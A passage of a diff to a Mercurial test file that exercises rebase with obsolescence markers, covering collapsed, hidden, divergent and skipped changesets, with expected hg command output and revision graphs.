2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 
'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex 
case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 
08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . 
- rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. 
- -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. 
- - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 
'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. 
- -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden 
changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a 
G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg 
log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . 
-d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config 
experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! 
(edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - Divergence cases due to obsolete changesets ------------------------------------------- @@ -1098,9 +72,9 @@ $ hg rebase -b 'e' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" + note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence rebasing 5:027ad6c5830d d' "d'" rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence $ hg log -G -r 'a':: o 11:eb6d63fc4ed5 e | @@ -1152,7 +126,7 @@ $ hg rebase -r 'c'::'f' -d 'x' abort: this rebase will cause divergences from: 76be324c128b (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' rebasing 3:a82ac2b38757 c "c" rebasing 4:76be324c128b d "d" @@ -1233,16 +207,16 @@ $ hg rebase -b 'f' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" rebasing 4:76be324c128b d "d" note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence + rebasing 5:63324dc512ea e' "e'" + rebasing 7:3ffec603ab53 f "f" $ hg log -G -r 'a': - o 13:a1707a5b7c2c d + o 13:ef6251596616 f | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' + o 12:b6f172e64af9 e' + | + | o 11:a1707a5b7c2c d |/ o 10:d008e6b4d3fd c | @@ -1250,13 +224,13 @@ | | * 8:2876ce66c6eb g | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) + | | x 
